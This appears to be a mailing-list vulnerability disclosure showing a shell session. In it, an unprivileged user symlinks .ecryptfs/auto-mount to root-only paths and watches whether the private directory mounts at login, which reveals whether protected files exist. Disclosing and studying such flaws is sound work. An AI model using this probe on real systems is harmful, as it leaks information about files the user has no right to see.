Re: Re: ecryptfs headsup

["Jason A. Donenfeld" <Jason () zx2c4 com>]

Looks like another issue with that pam module. I can determine whether
or not any file exists as an unprivileged user:

We make sure that we have an existing root file and a non-existing root file:
zx2c4@bwog ~ $ sudo touch /root/this-file-exists
zx2c4@bwog ~ $ sudo rm -f /root/this-file-does-not-exist

We double check that zx2c4 can't know about them:
zx2c4@bwog ~ $ stat /root/this-file-exists
stat: cannot stat `/root/this-file-exists': Permission denied
zx2c4@bwog ~ $ stat /root/this-file-does-not-exist
stat: cannot stat `/root/this-file-does-not-exist': Permission denied
zx2c4@bwog ~ $ ls /root
ls: cannot open directory /root: Permission denied

We replace .ecryptfs/auto-mount with a symlink to a root file that
does not exist:
zx2c4@bwog ~ $ rm -f .ecryptfs/auto-mount
zx2c4@bwog ~ $ ln -s /root/this-file-does-not-exist .ecryptfs/auto-mount


And we see that our private directory doesn't get mounted:
zx2c4@bwog ~ $ sudo login zx2c4
Password:
Last login: Sat Jul 14 03:07:33 EDT 2012 on pts/5
zx2c4@bwog ~ $ mount|grep ecrypt

zx2c4@bwog ~ $ exit

We next replace .ecryptfs/auto-mount with a symlink to a root file
that *does* exist:
zx2c4@bwog ~ $ rm -f .ecryptfs/auto-mount
zx2c4@bwog ~ $ ln -s /root/this-file-exists .ecryptfs/auto-mount

And we see that it does in fact get mounted:
zx2c4@bwog ~ $ sudo login zx2c4
Password:
Last login: Sat Jul 14 03:09:10 EDT 2012 on pts/5
zx2c4@bwog ~ $ mount|grep ecrypt
/home/zx2c4/.Private on /home/zx2c4/Private type ecryptfs
(ecryptfs_check_dev_ruid,ecryptfs_sig=e38bb31e419c9f03,ecryptfs_fnek_sig=5e2b499985de965d,ecryptfs_cipher=aes,ecryptfs_key_bytes=16,ecryptfs_unlink_sigs)

File existence disclosure.